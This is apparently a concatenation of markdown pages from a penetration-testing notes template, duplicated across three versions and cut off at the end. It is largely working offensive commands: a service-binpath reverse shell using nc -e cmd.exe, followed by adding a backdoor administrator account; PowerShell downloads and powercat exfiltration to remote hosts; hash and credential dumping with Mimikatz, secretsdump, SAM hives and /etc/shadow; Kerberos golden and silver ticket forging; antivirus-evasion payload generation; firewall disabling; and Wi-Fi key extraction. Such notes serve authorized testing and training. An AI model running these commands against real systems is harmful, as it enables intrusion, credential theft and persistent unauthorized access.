- python3 -m pyftpdlib -p 21 -w

Web:

- python3 -m http.server 443
- service apache2 start

PowerShell:

Raw (will get flagged by AV/AMSI):

- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file')
- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file"

Use Powercat:

Send File:
- powercat -c 10.1.1.1 -p 443 -i C:\inputfile

Receive File:
- powercat -l -p 8000 -of C:\inputfile

Linux:

scp:

- scp [OPTION] [[user@]SRC_HOST:]file1 [[user@]DEST_HOST:]file2

scp over a non-default SSH port:

- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory

scp a remote file to the local system:

- scp remote_username@172.21.0.2:/remote/file.txt /local/directory

# Services to allow you to upload files to your system from the target:

- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md:
--------------------------------------------------------------------------------
# Services to Host Files on your System:

General Options:

FTP:

Install pyftpdlib
- pip3 install pyftpdlib

Pure-ftpd
- sudo apt install pure-ftpd
- service pure-ftpd start

Run (the -w flag allows anonymous write access)
- python3 -m pyftpdlib -p 21 -w

Web:

- python3 -m http.server 443
- service apache2 start

PowerShell:

Raw (will get flagged by AV/AMSI):

- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file')
- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file"

Use Powercat:

Send File:
- powercat -c 10.1.1.1 -p 443 -i C:\inputfile

Receive File:
- powercat -l -p 8000 -of C:\inputfile

Linux:

scp:

- scp [OPTION] [[user@]SRC_HOST:]file1 [[user@]DEST_HOST:]file2

scp over a non-default SSH port:

- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory

scp a remote file to the local system:

- scp remote_username@172.21.0.2:/remote/file.txt /local/directory

# Services to allow you to upload files to your system from the target:

- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md:
--------------------------------------------------------------------------------
# Manual Connection

```
$ ssh 172.21.0.0 -p22
$ nc -nv 172.21.0.0 22 # Might return the version banner
```

# SSH Enumeration Tools

## Nmap Enumeration
```
$ ls -lh /usr/share/nmap/scripts/ | grep ssh
-rw-r--r-- 1 root root 5.3K Oct 12 09:29 ssh2-enum-algos.nse
-rw-r--r-- 1 root root 1.2K Oct 12 09:29 ssh-auth-methods.nse
-rw-r--r-- 1 root root 3.0K Oct 12 09:29 ssh-brute.nse
-rw-r--r-- 1 root root  16K Oct 12 09:29 ssh-hostkey.nse
-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ssh-publickey-acceptance.nse
-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ssh-run.nse
-rw-r--r-- 1 root root 1.4K Oct 12 09:29 sshv1.nse

$ nmap 172.21.0.0 -p 22 -sV --script ssh-hostkey --script-args ssh_hostkey=full
$ nmap 172.21.0.0 -p 22 -sV --script ssh-auth-methods --script-args="ssh.user=root"
```

## Crackmapexec

```
crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce
crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce -x whoami
```

## SSH Audit:
Source: https://github.com/jtesta/ssh-audit

```
python ssh-audit.py [-1246pbcnjvlt] 172.21.0.0
```

## Metasploit
```
Auxiliary Modules:
auxiliary/scanner/ssh/ssh_version
use scanner/ssh/ssh_enumusers
```

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md:
--------------------------------------------------------------------------------

## BENCHMARK TEST (HASH TYPE)

- hashcat -b -m #type

## SHOW EXAMPLE HASH

- hashcat -m #type --example-hashes

## DICTIONARY ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt

## DICTIONARY + RULES ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt

## COMBINATION ATTACK

- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt

## MASK ATTACK

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a

## HYBRID DICTIONARY + MASK

- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a

## HYBRID MASK + DICTIONARY

- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt

## INCREMENT

DEFAULT INCREMENT

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment

INCREMENT MINIMUM LENGTH (--increment-min requires --increment)

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment --increment-min=4

INCREMENT MAX LENGTH (--increment-max requires --increment)

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment --increment-max=5

## SESSION RESTORE

- hashcat --session <session_name> --restore (a restored session reuses the arguments it was started with; name it with --session when starting)

## Cracking krb5tgs hashes (Kerberoast, etype 23)

- hashcat -m 13100 --force

## Cracking AS-REP hashes (etype 23)

- hashcat -a 0 -m 18200

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md:
--------------------------------------------------------------------------------

## BENCHMARK TEST (HASH TYPE)

- hashcat -b -m #type

## SHOW EXAMPLE HASH

- hashcat -m #type --example-hashes

## DICTIONARY ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt

## DICTIONARY + RULES ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt

## COMBINATION ATTACK

- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt

## MASK ATTACK

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a

## HYBRID DICTIONARY + MASK

- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a

## HYBRID MASK + DICTIONARY

- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt

## INCREMENT

DEFAULT INCREMENT

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment

INCREMENT MINIMUM LENGTH (--increment-min requires --increment)

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment --increment-min=4

INCREMENT MAX LENGTH (--increment-max requires --increment)

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment --increment-max=5

## SESSION RESTORE

- hashcat --session <session_name> --restore (a restored session reuses the arguments it was started with; name it with --session when starting)

## Cracking krb5tgs hashes (Kerberoast, etype 23)

- hashcat -m 13100 --force

## Cracking AS-REP hashes (etype 23)

- hashcat -a 0 -m 18200

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md:
--------------------------------------------------------------------------------

## BENCHMARK TEST (HASH TYPE)

- hashcat -b -m #type

## SHOW EXAMPLE HASH

- hashcat -m #type --example-hashes

## DICTIONARY ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt

## DICTIONARY + RULES ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt

## COMBINATION ATTACK

- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt

## MASK ATTACK

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a

## HYBRID DICTIONARY + MASK

- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a

## HYBRID MASK + DICTIONARY

- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt

## INCREMENT

DEFAULT INCREMENT

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment

INCREMENT MINIMUM LENGTH (--increment-min requires --increment)

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment --increment-min=4

INCREMENT MAX LENGTH (--increment-max requires --increment)

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment --increment-max=5

## SESSION RESTORE

- hashcat --session <session_name> --restore (a restored session reuses the arguments it was started with; name it with --session when starting)

## Cracking krb5tgs hashes (Kerberoast, etype 23)

- hashcat -m 13100 --force

## Cracking AS-REP hashes (etype 23)

- hashcat -a 0 -m 18200

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md:
--------------------------------------------------------------------------------
# General Notes:
Always try anonymous login if it is available:

Username: anonymous
Password: anonymous (or anything else you want to put in)

# FTP Enumeration Tools
## Manual Connection
```
$ ftp 172.21.0.0
```
```
$ nc -vn 172.21.0.0 21
```
## Connect via Browser
```
ftp://172.21.0.0
```

## Nmap FTP Enumeration
```
$ ls -lh /usr/share/nmap/scripts/ | grep ftp
-rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse
-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse
-rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse
-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse
-rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse
-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse
$ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse
```

## CrackMapExec

```
crackmapexec ftp 172.21.0.0
crackmapexec ftp 172.21.0.0 -u 'a' -p ''
crackmapexec ftp 172.21.0.0 -u 'anonymous' -p ''
```

# FTP Default wordlists:
```
/usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
```

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md:
--------------------------------------------------------------------------------
## Veil Framework:

Install on Kali:
- apt install veil
- /usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veil

## Shellter

Source: https://www.shellterproject.com/download/

- apt install shellter

## SharpShooter

JavaScript Payload, Stageless:
- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload:

- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooter

## Donut:

Source: https://github.com/TheWover/donut

## Vulcan

Source: https://github.com/praetorian-code/vulcan

## ScareCrow

Source: https://github.com/optiv/ScareCrow

In Kali:

sudo apt install golang

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo

go build ScareCrow.go

./ScareCrow

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Dumping Hashes.md:
--------------------------------------------------------------------------------
# Windows:

## Meterpreter HashDump

- run post/windows/gather/hashdump

## Meterpreter Mimikatz (post-exploitation commands must be executed with SYSTEM privileges)

- load mimikatz
- creds_all

## DUMP LSA SECRETS

- lsadump.py sys_backup.hiv sec_backup.hiv

## DUMP LOCAL PASSWORD HASHES

- pwdump.py sys_backup.hiv sec_backup.hiv

## reg.exe

- reg save HKLM\sam sam
- reg save HKLM\system system

## samdump2

- samdump2 SYSTEM SAM > hashes.db

## Impacket Tools:

- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes

If you have the NTDS.dit file and the SYSTEM hive:

- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Linux

Requires root privileges

- cat /etc/shadow

- copy /etc/passwd and /etc/shadow to your system
- unshadow passwd shadow

# OSX

10.5-10.7

- dscl localhost -read /Search/Users/ | grep GeneratedUID | cut -c15-
- cat /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt

10.8-10.12

- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData | tr -dc '0-9a-f' | xxd -p -r | plutil -convert xml1 - -o -

# Other Resources:

- Lsassy: https://github.com/Hackndo/lsassy
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Dumping Hashes.md:
--------------------------------------------------------------------------------
# Windows:

## Meterpreter HashDump

- run post/windows/gather/hashdump

## Meterpreter Mimikatz (post-exploitation commands must be executed with SYSTEM privileges)

- load mimikatz
- creds_all

## DUMP LSA SECRETS

- lsadump.py sys_backup.hiv sec_backup.hiv

## DUMP LOCAL PASSWORD HASHES

- pwdump.py sys_backup.hiv sec_backup.hiv

## reg.exe

- reg save HKLM\sam sam
- reg save HKLM\system system

## samdump2

- samdump2 SYSTEM SAM > hashes.db

## Impacket Tools:

- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes

If you have the NTDS.dit file and the SYSTEM hive:

- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Linux

Requires root privileges

- cat /etc/shadow

- copy /etc/passwd and /etc/shadow to your system
- unshadow passwd shadow

# OSX

10.5-10.7

- dscl localhost -read /Search/Users/ | grep GeneratedUID | cut -c15-
- cat /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt

10.8-10.12

- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData | tr -dc '0-9a-f' | xxd -p -r | plutil -convert xml1 - -o -

# Other Resources:

- Lsassy: https://github.com/Hackndo/lsassy
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Dumping Hashes.md:
--------------------------------------------------------------------------------
# Windows:

## Meterpreter HashDump

- run post/windows/gather/hashdump

## Meterpreter Mimikatz (post-exploitation commands must be executed with SYSTEM privileges)

- load mimikatz
- creds_all

## DUMP LSA SECRETS

- lsadump.py sys_backup.hiv sec_backup.hiv

## DUMP LOCAL PASSWORD HASHES

- pwdump.py sys_backup.hiv sec_backup.hiv

## reg.exe

- reg save HKLM\sam sam
- reg save HKLM\system system

## samdump2

- samdump2 SYSTEM SAM > hashes.db

## Impacket Tools:

- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes

If you have the NTDS.dit file and the SYSTEM hive:

- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Linux

Requires root privileges

- cat /etc/shadow

- copy /etc/passwd and /etc/shadow to your system
- unshadow passwd shadow

# OSX

10.5-10.7

- dscl localhost -read /Search/Users/ | grep GeneratedUID | cut -c15-
- cat /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt

10.8-10.12

- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData | tr -dc '0-9a-f' | xxd -p -r | plutil -convert xml1 - -o -

# Other Resources:

- Lsassy: https://github.com/Hackndo/lsassy
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md:
--------------------------------------------------------------------------------
# Editable Service

If you find a service that is editable (WinPEAS can help find such services), you can edit the binpath to point to nc.exe to get a reverse shell.

Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc

Note: in both of my experiences using this, it does get a shell, but it closes in a few seconds.

1. Upload `nc.exe` to a writable directory.
2. `sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv 9988 -e C:\Windows\System32\cmd.exe"`
3. `sc config usosvc obj= ".\LocalSystem" password= ""`
   - I didn't need this the second time I used it
4. `sc config usosvc start= "demand"`
5. `nc -lvp 9988` (set up the listener on Kali)
6. `net start usosvc`
7. R00T!

Since the shell closes soon, add a new admin user:
1. `net user hacker h@ck3r%93 /add`
2. `net localgroup administrators hacker /add`

Now RDP/SSH with the new creds (if those services are available, or you can open them yourself):
1. `rdesktop `
2. R00T!

The shell closes because of a Windows registry timeout value that defines how long the Service Control Manager waits for a service to respond. If you're in a position to edit that (i.e., SSH/RDP are not enabled), this would stabilize the shell.
If you don't want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md:
--------------------------------------------------------------------------------
# Linux Commands to run:

- top
- htop
- ps -e
- ps aux
- ps aux | more
- ps aux | less

# Finding processes

- pgrep

# Terminating a Process

- kill
- kill -9 PID
- pkill processName
- killall

# Kill user tty/pts sessions in Linux

## Commands

- `w`: show who is logged on and what they are doing
- `who`: show who is logged on
- `tty`: show the current user's pseudo-terminal
- `ps -ft pts/1`: get the process ID for the pseudo-terminal
- `pkill`: signal processes based on name and other attributes

1. Check active users logged into the server with: `w`
```
16:53:37 up 23:46, 2 users, load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
debian   pts/1    24.69.132.96      16:45    0.00s  0.04s  0.00s w
debain   pts/2    24.69.132.96:S.0  16:35   16.00s  0.02s  0.02s /bin/bash
```
2. Get the PID (Process ID) of a connected terminal (tty) with: `ps -ft pts/1`
```
UID        PID  PPID  C STIME TTY          TIME CMD
debian   28580 28102  0 16:45 pts/1    00:00:00 -bash
debian   29081 28580  0 16:55 pts/1    00:00:00 ps -ft pts/1
```
3. Kill the process: `kill 28580`

4. Alternatively use `pkill -t pts/1`

# Tools to check for running processes:

## pspy

Source: https://github.com/DominicBreuker/pspy/releases/

- pspy --help

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md:
--------------------------------------------------------------------------------
# PowerShell

```
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize
```

Note: the Wow6432Node key lists 32-bit applications on a 64-bit system; query `HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*` as well for 64-bit applications.

## Obtaining a list of programs from a remote system:

- ```Invoke-Command -ComputerName remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }```

## Here is a script that will pull a list of software that is installed on the user's system:

```
# Enumerate every uninstall key and print its DisplayName
$listsoftware = Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall

$names = $listsoftware | ForEach-Object { Get-ItemProperty $_.PsPath }

foreach ($name in $names)
{
    Write-Host $name.DisplayName
}
```

## WMI:

- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt```

Note: querying Win32_Product makes Windows Installer run a consistency check on every MSI package, which is slow and can trigger repairs; prefer the registry queries above where possible.

## Reviewing Installed Windows Features

- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}``` (Windows Server, ServerManager module)

# Wmic

## Note: Microsoft has planned to deprecate this program in newer versions of Windows. The commands can be slow to run, but they return the results needed:

- wmic /output:C:\InstalledSoftwareList.txt product get name,version

## Saving it to a CSV file:

- wmic product get name,version /format:csv > C:\InstalledSoftware.csv
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md:
--------------------------------------------------------------------------------
## List all network interfaces, IP, and DNS.

- ipconfig /all
- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
- Get-DnsClientServerAddress -AddressFamily IPv4 | ft

## List all current connections

- netstat -nao

## List firewall state and current configuration

- netsh advfirewall firewall dump
- netsh firewall show state
- netsh firewall show config

## List firewall's blocked ports

- $f=New-Object -ComObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

## Disable firewall

- netsh firewall set opmode disable (older versions of Windows)
- netsh advfirewall set allprofiles state off

## List current routing table

- route print
- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

## List the ARP table

- arp -a
- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

## List all network shares

- net share

## Wifi Passwords:

Finding the SSID:
- netsh wlan show profile

Obtaining the cleartext password:
- netsh wlan show profile key=clear
- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md:
--------------------------------------------------------------------------------
# Mimikatz

Post-exploitation commands must be executed with SYSTEM-level privileges.
- mimikatz # privilege::debug
- mimikatz # token::whoami
- mimikatz # token::elevate
- mimikatz # lsadump::sam
- mimikatz # sekurlsa::logonpasswords

## Pass The Hash

- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash

## Inject a generated ticket (pass the ticket)

- mimikatz # kerberos::ptt

## Generating a silver ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes256: /user: /service: /target:

AES 128 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes128: /user: /service: /target:

NTLM:

- mimikatz # kerberos::golden /domain: /sid: /rc4: /user: /service: /target:

## Generating a Golden Ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes256: /user:

AES 128 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes128: /user:

NTLM:

- mimikatz # kerberos::golden /domain: /sid: /rc4: /user:

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md:
--------------------------------------------------------------------------------
# Mimikatz

Post-exploitation commands must be executed with SYSTEM-level privileges.
- mimikatz # privilege::debug
- mimikatz # token::whoami
- mimikatz # token::elevate
- mimikatz # lsadump::sam
- mimikatz # sekurlsa::logonpasswords

## Pass The Hash

- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash

## Inject a generated ticket (pass the ticket)

- mimikatz # kerberos::ptt

## Generating a silver ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes256: /user: /service: /target:

AES 128 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes128: /user: /service: /target:

NTLM:

- mimikatz # kerberos::golden /domain: /sid: /rc4: /user: /service: /target:

## Generating a Golden Ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes256: /user:

AES 128 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes128: /user:

NTLM:

- mimikatz # kerberos::golden /domain: /sid: /rc4: /user:

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md:
--------------------------------------------------------------------------------
# PowerShell

```
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize
```

Note: the Wow6432Node key lists 32-bit applications on a 64-bit system; query `HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*` as well for 64-bit applications.

## Obtaining a list of programs from a remote system:

- ```Invoke-Command -ComputerName remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }```

## Here is a script that will pull a list of software that is installed on the user's system:

```
# Enumerate every uninstall key and print its DisplayName
$listsoftware = Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall

$names = $listsoftware | ForEach-Object { Get-ItemProperty $_.PsPath }

foreach ($name in $names)
{
    Write-Host $name.DisplayName
}
```

## WMI:

- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt```

Note: querying Win32_Product makes Windows Installer run a consistency check on every MSI package, which is slow and can trigger repairs; prefer the registry queries above where possible.

## Reviewing Installed Windows Features

- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}``` (Windows Server, ServerManager module)

# Wmic

## Note: Microsoft has planned to deprecate this program in newer versions of Windows. The commands can be slow to run, but they return the results needed:

- wmic /output:C:\InstalledSoftwareList.txt product get name,version

## Saving it to a CSV file:

- wmic product get name,version /format:csv > C:\InstalledSoftware.csv
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md:
--------------------------------------------------------------------------------
# Mimikatz

Post-exploitation commands must be executed with SYSTEM-level privileges.
- mimikatz # privilege::debug
- mimikatz # token::whoami
- mimikatz # token::elevate
- mimikatz # lsadump::sam
- mimikatz # sekurlsa::logonpasswords

## Pass The Hash

- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash

## Inject a generated ticket (pass the ticket)

- mimikatz # kerberos::ptt

## Generating a silver ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes256: /user: /service: /target:

AES 128 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes128: /user: /service: /target:

NTLM:

- mimikatz # kerberos::golden /domain: /sid: /rc4: /user: /service: /target:

## Generating a Golden Ticket

AES 256 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes256: /user:

AES 128 Key:

- mimikatz # kerberos::golden /domain: /sid: /aes128: /user:

NTLM:

- mimikatz # kerberos::golden /domain: /sid: /rc4: /user:

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md:
--------------------------------------------------------------------------------
## Veil Framework:

Install on Kali:
- apt install veil
- /usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veil

## Shellter

Source: https://www.shellterproject.com/download/

- apt install shellter

## SharpShooter

JavaScript Payload, Stageless:
- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload:

- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooter

## Donut:

Source: https://github.com/TheWover/donut

## Vulcan

Source: https://github.com/praetorian-code/vulcan

## ScareCrow

Source: https://github.com/optiv/ScareCrow

In Kali:

sudo apt install golang

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo

go build ScareCrow.go

./ScareCrow

# Resources:

- https://book.hacktricks.xyz/windows-hardening/av-bypass
- https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1.
General Notes.md: -------------------------------------------------------------------------------- 1 | ## Spawn a tty: 2 | 3 | 1. rlwrap nc localhost 80 4 | 5 | 2. rlwrap -r -f . nc 6 | 7 | - socat file:`tty`,raw,echo=0 tcp-listen:12345 8 | - /bin/sh -i 9 | - python -c 'import pty; pty.spawn("/bin/sh")' 10 | - perl -e 'exec "/bin/sh";' 11 | - perl: exec "/bin/sh"; 12 | - ruby: exec "/bin/sh" 13 | - lua: os.execute('/bin/sh') 14 | 15 | ## Priviledge Escalation Scripts: 16 | 17 | Windows: 18 | - Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng 19 | - Sherlock: https://github.com/rasta-mouse/Sherlock 20 | - Powersploit: https://github.com/PowerShellMafia/PowerSploit 21 | - WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS 22 | 23 | Linux: 24 | - Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2 25 | - LinEnum: https://github.com/rebootuser/LinEnum 26 | - UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check 27 | - LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 28 | 29 | ## Other Resources: 30 | 31 | PowerSharpPack: 32 | - https://github.com/S3cur3Th1sSh1t/PowerSharpPack 33 | 34 | Windows: 35 | - LOLBAS: https://lolbas-project.github.io/# 36 | - Windows Privilege Escalation Fundmentals: 